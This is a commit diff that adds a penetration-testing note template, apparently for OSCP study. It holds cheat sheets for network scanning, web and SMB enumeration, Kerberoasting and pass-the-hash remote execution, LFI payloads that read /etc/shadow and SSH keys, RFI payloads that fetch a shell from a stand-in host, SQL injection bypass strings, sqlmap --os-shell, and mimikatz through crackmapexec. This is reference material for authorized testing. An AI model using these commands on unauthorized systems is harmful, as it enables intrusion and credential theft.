Modifying things differently

tjnull · Aug 5, 2023 · b11548d · b11548d
1 parent 5692d62
commit b11548d
Show file tree

Hide file tree

Showing 200 changed files with 7,579 additions and 0 deletions.
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,2 @@
+# Ignore Obsidian Files
+*.obsidian
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md
@@ -0,0 +1,100 @@
+# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to"
+
+
+## tcpdump:
+
+- tcpdump -i eth0
+- tcpdump -c -i eth0
+- tcpdump -A -i eth0
+- tcpdump -w 0001.pcap -i eth0
+- tcpdump -r 0001.pcap
+- tcpdump -n -i eth0
+- tcpdump -i eth0 port 22
+- tcpdump -i eth0 -src 172.21.10.X
+- tcpdump -i eth0 -dst 172.21.10.X
+
+Other tools: 
+
+Tshark (Command Line Wireshark)
+Wireshark
+
+
+## Network Scanning
+
+NetDiscover (ARP Scanning):
+- netdiscover -i eth0
+- netdiscover -r 172.21.10.0/24
+
+Nmap:
+
+- nmap -sn 172.21.10.0/24
+- nmap -sn 172.21.10.1-253
+- nmap -sn 172.21.10.*
+
+Nbtscan: 
+- nbtscan -r 172.21.1.0/24
+
+Linux Ping Sweep (Bash)
+
+- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done
+
+Windows Ping Sweep (Run on Windows System)
+
+- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up.
+
+
+
+## Host Scanning
+
+Nmap:
+
+- nmap -sC -sV 172.21.0.0
+- nmap -sV -Pn 172.21.0.0
+- nmap -T4 -sC -sV 172.21.0.0
+- nmap -A 172.21.0.0
+
+IPv6 Scan:
+
+Nmap Scripts: 
+
+Location: /usr/share/nmap/scripts/
+
+- nmap --scripts vuln,safe,discovery -oN results.txt target-ip
+
+Scans through Socks proxy: 
+
+- nmap --proxies socks4://proxy-ip:8080 target-ip
+
+DNSRecon: 
+
+- dnsrecon -d www.example.com -a 
+- dnsrecon -d www.example.com -t axfr
+- dnsrecon -d <startIP-endIP>
+- dnsrecon -d www.example.com -D <namelist> -t brt
+
+Dig: 
+
+- dig www.example.com + short
+- dig www.example.com MX
+- dig www.example.com NS
+- dig www.example.com> SOA
+- dig www.example.com ANY +noall +answer
+- dig -x www.example.com
+- dig -4 www.example.com (For IPv4)
+- dig -6 www.example.com (For IPv6)
+- dig www.example.com mx +noall +answer example.com ns +noall +answer
+- dig -t AXFR www.example.com
+
+Sublis3r:
+
+- Sublist3r -d www.example.com
+- Sublist3r -v -d www.example.com -p 80,443
+
+OWASP AMASS: 
+
+- amass enum -d www.example.com
+- amass intel -whois -d www.example.com
+- amass intel -active 172.21.0.0-64 -p 80,443,8080,8443
+- amass intel -ipv4 -whois -d www.example.com
+- amass intel -ipv6 -whois -d www.example.com
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md
@@ -0,0 +1,6 @@
+# Fill in results or other information about your target here: 
+
+
+
+
+
diff --git a/...Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md b/...Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md
@@ -0,0 +1,6 @@
+# When in Doubt...Always Enumerate! Enumeration is the key!
+
+
+
+## Resources
+- http://www.0daysecurity.com/penetration-testing/enumeration.html
diff --git a/...Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md b/...Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md
@@ -0,0 +1,12 @@
+## In Kali
+
+apt install impacket-scripts
+
+## Github
+
+https://github.com/SecureAuthCorp/impacket
+
+## Local Locations:
+
+/usr/share/doc/python3-impacket/examples
+
diff --git a/...Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md b/...Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md
@@ -0,0 +1,24 @@
+## Check for Kerberoasting: 
+
+- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john
+
+## GetUserSPNs
+
+ASREPRoast:
+- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
+- impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
+
+Kerberoasting: 
+- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> 
+
+Overpass The Hash/Pass The Key (PTK):
+- python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
+- python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
+- python3 getTGT.py <domain_name>/<user_name>:[password]
+
+## Using TGT key to excute remote commands from the following impacket scripts:
+
+- python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+- python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+- python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+
diff --git a/...est_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md b/...est_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md
@@ -0,0 +1,23 @@
+Cannot use in the OSCP Exam. Fun to use on assessments.
+Note: Multirelay.py does not work in python3 since the UserDict library has been depricated
+
+
+# Source: https://github.com/lgandx/Responder
+
+## Make changes to config to turn off services:
+
+nano /usr/share/responder/Responder.conf
+
+## Starting Responder:
+
+- responder -I [Interface] -A
+- responder -I [Interface] -i [IP Address] or -e [External IP] -A
+
+## Tools in Responder: 
+
+Location: /usr/share/Responder/tools
+
+## Check for systems with SMB Signing not enabled
+
+- python3 RunFinger.py -i 172.21.0.0/24
+
diff --git a/...1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md b/...1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md
@@ -0,0 +1,102 @@
+
+## Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!
+
+
+## Web App Scanners
+
+Nikto: 
+
+- nikto --url <domain>
+
+Wpscan:
+
+- wpscan --url <domain>
+- wpscan --url <domain> --enumerate ap at (All Plugins, All Themes)
+- wpscan --url <domain> --enumerate u (Usernames)
+- wpscan --url <domain> --enumerate v
+
+Web Tools for Directory Scanning: 
+
+Dirb: 
+
+- dirb <domain>
+- dirb <domain> <wordlist>
+
+Gobuster: 
+
+- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file>
+- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -a Firefox (Custom Agent)
+- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html
+- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" -o output.txt
+- gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
+
+Wfuzz:
+
+- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
+- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
+- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ"  --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)
+
+- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)
+
+Dirsearch: 
+
+- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php
+
+
+Other Tools: 
+- Burp Suite
+- OWASP Zap
+- Cadaver
+- SQLMap
+- Joomscan
+
+
+## Testing for LFI: 
+
+https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf
+
+Examples: 
+
+http://example.com/index.php?page=etc/passwd
+http://example.com/index.php?page=etc/passwd%00
+http://example.com/index.php?page=../../etc/passwd
+http://example.com/index.php?page=%252e%252e%252f
+http://example.com/index.php?page=....//....//etc/passwd
+
+Interesting Files:
+
+Linux:
+/etc/passwd
+/etc/shadow
+/etc/issue
+/etc/group
+/etc/hostname
+/etc/ssh/ssh_config
+/etc/ssh/sshd_config
+/root/.ssh/id_rsa
+/root/.ssh/authorized_keys
+/home/user/.ssh/authorized_keys
+/home/user/.ssh/id_rsa
+
+Windows:
+
+Windows:
+/boot.ini
+/autoexec.bat
+/windows/system32/drivers/etc/hosts
+/windows/repair/SAM
+
+
+
+## Testing for RFI: 
+
+http://example.com/index.php?page=http://callback.com/shell.txt
+http://example.com/index.php?page=http://callback.com/shell.txt%00
+http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
+
+## Resources
+
+- Turning LFI to RFI: https://l.avala.mp/?p=241
diff --git a/...1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md b/...1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md
@@ -0,0 +1,25 @@
+Testing for Bypasses: 
+
+' or 1=1 LIMIT 1 --
+' or 1=1 LIMIT 1 -- -
+' or 1=1 LIMIT 1#
+'or 1#
+' or 1=1 --
+' or 1=1 -- -
+
+# SQLMAP
+
+## sqlmap crawl  
+sqlmap -u http://172.21.0.0 --crawl=1
+
+## sqlmap dump database  
+sqlmap -u http://172.21.0.0 --dbms=mysql --dump
+
+## sqlmap shell  
+sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell
+
+# SQLI
+
+Testing for a row: 
+
+- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8
diff --git a/...ter_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md b/...ter_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
diff --git a/...1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md b/...1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md
@@ -0,0 +1,63 @@
+
+## Enumerate SMB:
+
+Enum4linux:
+
+- Enum4linux -a 172.21.0.0
+
+SMBmap:
+
+- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
+- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""
+
+Nmap: 
+
+- nmap --script smb-* -p 139,445, 172.21.0.0
+- nmap --script smb-enum-* -p 139,445, 172.21.0.0
+
+/usr/share/nmap/scripts/smb-brute.nse
+/usr/share/nmap/scripts/smb-enum-domains.nse
+/usr/share/nmap/scripts/smb-enum-groups.nse
+/usr/share/nmap/scripts/smb-enum-processes.nse
+/usr/share/nmap/scripts/smb-enum-services.nse
+/usr/share/nmap/scripts/smb-enum-sessions.nse
+/usr/share/nmap/scripts/smb-enum-shares.nse
+/usr/share/nmap/scripts/smb-enum-users.nse
+/usr/share/nmap/scripts/smb-flood.nse
+/usr/share/nmap/scripts/smb-ls.nse
+/usr/share/nmap/scripts/smb-mbenum.nse
+/usr/share/nmap/scripts/smb-os-discovery.nse
+/usr/share/nmap/scripts/smb-print-text.nse
+/usr/share/nmap/scripts/smb-protocols.nse
+/usr/share/nmap/scripts/smb-psexec.nse
+/usr/share/nmap/scripts/smb-security-mode.nse
+/usr/share/nmap/scripts/smb-server-stats.nse
+/usr/share/nmap/scripts/smb-system-info.nse
+
+
+SMBClient: 
+
+- smbclient -L 172.21.0.0
+- smbclient //172.21.0.0/tmp
+
+Impacket SmbClient: 
+
+- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0
+
+RPCclient: 
+
+- rpcclient -U "" -N 172.21.0.0 enumdomusers
+
+Impacket: 
+
+- python3 samdump.py SMB 172.21.0.0
+
+CrackMapExec: 
+
+- crackmapexec smb -L 
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share
+- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz
+
+
+
diff --git a/...ter_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md b/...ter_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: